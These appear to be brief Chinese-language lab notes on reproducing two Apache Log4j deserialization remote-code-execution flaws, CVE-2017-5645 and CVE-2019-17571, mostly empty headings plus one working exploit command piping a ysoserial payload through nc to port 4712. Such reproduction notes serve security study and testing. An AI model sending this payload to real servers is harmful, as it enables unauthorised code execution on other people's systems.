CVE-2017-5645
Date 2017 类型 Java反序列化导致远程代码执行
前置条件
log4j对应的端口对外开放
影响范围
复现
java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc your-ip 4712
分析
CVE-2019-17571
Date 2019 类型 Java反序列化导致远程代码执行
前置条件
log4j对应的端口对外开放 影响范围
1.2.4 <= Apache Log4j <= 1.2.17 复现 分析